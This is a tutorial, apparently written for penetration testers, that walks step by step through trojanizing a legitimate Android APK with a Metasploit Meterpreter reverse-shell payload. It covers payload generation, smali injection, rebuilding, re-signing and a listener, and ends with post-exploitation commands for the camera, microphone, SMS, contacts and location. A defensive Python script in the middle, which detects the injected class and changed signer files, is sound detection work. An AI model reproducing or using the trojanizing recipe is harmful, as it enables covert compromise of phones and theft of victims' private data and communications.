Embedding a Reverse Shell in Any Android APK: A Comprehensive Guide for Penetration Testers
Legal Disclaimer
This article is intended for ethical hacking, penetration testing, and educational purposes only. Do not use any of the techniques described herein without explicit permission on systems or devices you do not own. Misuse may be considered a criminal offense.
Overview
In Android penetration testing, it's often necessary to simulate real-world attacks to test the resilience of applications and users. One powerful technique is embedding a reverse shell into a legitimate APK, effectively turning any benign app into a trojanized payload.
This guide walks you through the entire process — from decompiling an APK and injecting a Metasploit payload, to signing and deploying it, then capturing the reverse shell.
Required Tools
Install the following on your Linux environment (Kali Linux is used here):
sudo apt update
sudo apt install apktool aapt openjdk-17-jdk zipalign
- apktool – Disassemble and reassemble APKs.
- aapt – Extract Android manifest and metadata.
- keytool & jarsigner – Generate keystores and sign the APK.
- zipalign – Aligns the APK for proper installation (optional but recommended).
- Metasploit Framework – Generate payloads and handle connections.
Step-by-Step Instructions
Step 1: Generate the Payload APK with msfvenom
msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.0.105 LPORT=4444 -o payload.apk
Explanation:
- -p: Payload type.
- LHOST: Attacker's IP address.
- LPORT: Listening port.
- -o: Output file.
This creates a malicious APK named payload.apk that contains the Meterpreter payload.
Step 2: Decompile Both APKs
Disassemble the legitimate app and the payload using apktool.
apktool d appname.apk -o original_app
apktool d payload.apk -o payload_app
Sample Output:
I: Using Apktool 2.x.x...
I: Decoding AndroidManifest.xml...
I: Copying assets and smali classes...
Step 3: Identify the Launchable Activity
To inject the payload where the app starts, locate the main activity using aapt.
aapt dump badging appname.apk | grep launchable-activity
Output:
launchable-activity: name='com.example.app.MainActivity'
Take note of the activity name. This indicates which smali file to modify.
Step 4: Edit the Launch Activity (onCreate())
Navigate to the directory containing the identified smali file:
cd original_app/smali/com/example/app/
nano MainActivity.smali
Locate the method:
.method protected onCreate(Landroid/os/Bundle;)V
Directly after the super.onCreate(...) line, add:
invoke-static {p0}, Lcom/metasploit/stage/Payload;->start(Landroid/content/Context;)V
Purpose: This line initiates the Meterpreter payload when the app launches.
Step 5: Copy the Malicious Payload
Copy the payload classes from the payload_app directory into the legitimate application's structure:
cp -r payload_app/smali/com/metasploit original_app/smali/com/
This makes the com.metasploit.stage.Payload class referenced by the injected invoke-static call available at runtime; without it the app would crash on launch with a missing-class error.
Step 6: Rebuild the APK
Use apktool to recompile the modified app.
apktool b original_app -o evil_app.apk
Expected Output:
I: Smaling smali folder into classes.dex...
I: Building resources...
I: Building apk file...
Step 7: Sign the APK
Unsigned APKs will not install on Android devices. Generate and use a keystore to sign the APK.
Generate Keystore (if needed):
keytool -genkey -v -keystore my-release-key.keystore \
-alias myalias -keyalg RSA -keysize 2048 -validity 10000
Follow the prompts to create the keystore.
Sign the APK:
jarsigner -verbose -sigalg SHA1withRSA -digestalg SHA1 \
-keystore my-release-key.keystore evil_app.apk myalias
(Optional) Optimize with zipalign:
zipalign -v 4 evil_app.apk evil_app_aligned.apk
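Defensive counterpart to Steps 4, 5 and 7: the injected invoke-static call leaves the Lcom/metasploit/stage/Payload; descriptor in the rebuilt classes.dex, and re-signing with a fresh keystore replaces the vendor's META-INF signature files with ones named after the new alias (jarsigner writes MYALIAS.SF and MYALIAS.RSA for the keystore above). The following Python script is an added example, not code from the original article, apktool or Metasploit; it triages an APK as the ZIP archive it is and flags both indicators without installing or running anything. The in-memory sample APKs, the fake dex content and the assumed vendor signer file name META-INF/VENDOR.RSA are constructed for the demonstration.

```python
"""Static triage for the trojanizing pattern in Steps 4, 5 and 7.

Added example (not from the original article, apktool or Metasploit).
It treats the APK as the ZIP archive it is and never installs or runs it.
The sample APKs below are constructed in memory so the script runs offline.
"""
import hashlib
import io
import re
import zipfile
from typing import Optional

# Class descriptor that the injected invoke-static call (Step 4) references and
# that Step 5 copies into the app; after `apktool b` it sits verbatim in the
# string table of classes.dex, so a plain byte search finds it.
STAGE_CLASS = b"Lcom/metasploit/stage/Payload;"

# jarsigner (Step 7) names the v1 signature files after the key alias,
# upper-cased and cut to 8 characters: alias "myalias" -> META-INF/MYALIAS.RSA.
# A rebuilt copy therefore usually carries different file names than the
# vendor's build. (Assumption for this demo: the vendor signs as VENDOR.)
SIGNER_FILE = re.compile(r"^META-INF/[^/]+\.(RSA|DSA|EC)$")
DEX_FILE = re.compile(r"^classes\d*\.dex$")


def triage_apk(apk_bytes: bytes) -> dict:
    """Return indicators found in one APK: which dex files contain the
    Metasploit stage class, and which v1 signer files are present (with a
    SHA-256 of each block so two copies can be compared byte-for-byte)."""
    findings = {"stage_class_in": [], "signer_files": {}}
    with zipfile.ZipFile(io.BytesIO(apk_bytes)) as zf:
        for name in zf.namelist():
            if DEX_FILE.match(name):
                if STAGE_CLASS in zf.read(name):
                    findings["stage_class_in"].append(name)
            elif SIGNER_FILE.match(name):
                findings["signer_files"][name] = hashlib.sha256(zf.read(name)).hexdigest()
    return findings


def is_suspicious(findings: dict, expected_signer_files: Optional[set] = None) -> bool:
    """Flag an APK that embeds the stage class, carries no v1 signature at all,
    or is signed under file names other than the ones the vendor is known to use."""
    if findings["stage_class_in"]:
        return True
    present = set(findings["signer_files"])
    if not present:
        return True
    if expected_signer_files is not None and present != expected_signer_files:
        return True
    return False


def build_sample_apk(trojanized: bool) -> bytes:
    """Constructed stand-in for an APK: a fake dex header plus a string-table
    fragment, a binary-XML placeholder manifest, and a placeholder signer block."""
    dex = b"dex\n035\x00" + b"\x00" * 32 + b"Lcom/example/app/MainActivity;\x00"
    if trojanized:
        dex += STAGE_CLASS + b"\x00"          # what the Step 5 copy leaves behind
    signer = "META-INF/MYALIAS.RSA" if trojanized else "META-INF/VENDOR.RSA"
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("AndroidManifest.xml", b"\x03\x00\x08\x00")  # binary XML header only
        zf.writestr("classes.dex", dex)
        zf.writestr(signer, b"\x30\x82" + b"\x00" * 16)            # DER placeholder
    return buf.getvalue()


if __name__ == "__main__":
    # Learn the vendor's signer file names from a trusted copy, then triage both.
    vendor_files = set(triage_apk(build_sample_apk(False))["signer_files"])
    for label, apk in (("vendor build", build_sample_apk(False)),
                       ("rebuilt copy", build_sample_apk(True))):
        result = triage_apk(apk)
        print(f"{label}: suspicious={is_suspicious(result, vendor_files)} {result}")
```

The dex search works unchanged on a real APK because the Step 6 rebuild writes the descriptor into the string table as-is. The META-INF check only covers the v1 (JAR) signature that jarsigner produces; an APK signed solely with the v2/v3 scheme keeps its signature in the APK Signing Block and has no .RSA entry, so for a definitive signer comparison run apksigner verify --print-certs on both copies and compare certificate digests rather than file names.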
Step 8: Set Up the Metasploit Listener
Open Metasploit and configure the handler:
msfconsole
Configure the payload handler:
use exploit/multi/handler
set PAYLOAD android/meterpreter/reverse_tcp
set LHOST 192.168.0.105
set LPORT 4444
exploit
Step 9: Deploy and Install APK
Transfer the APK to a testing device and install it:
adb install evil_app.apk
Once the app is launched, you’ll receive a Meterpreter session in your Metasploit console.
Post-Exploitation with Meterpreter
Here are useful commands once you have a Meterpreter session on the Android device:
Command | Function
---|---
sysinfo | Display OS and device information
getuid | Show current user identity
webcam_snap | Take a picture using the device camera
record_mic | Record audio from the device microphone
dump_sms | Retrieve SMS messages
dump_contacts | Export contact list
geolocate | Obtain GPS coordinates
app_list | List all installed applications
shell | Access device shell
upload, download | Transfer files to and from the device
cd, ls | Navigate the Android file system
Conclusion
Embedding a reverse shell in an APK is a powerful method that highlights how attackers can Trojanize legitimate mobile applications. This technique is invaluable in testing mobile security postures and training blue teams to recognize real-world threat vectors.
Use this knowledge strictly for authorized and ethical purposes. Always notify clients and adhere to penetration testing guidelines.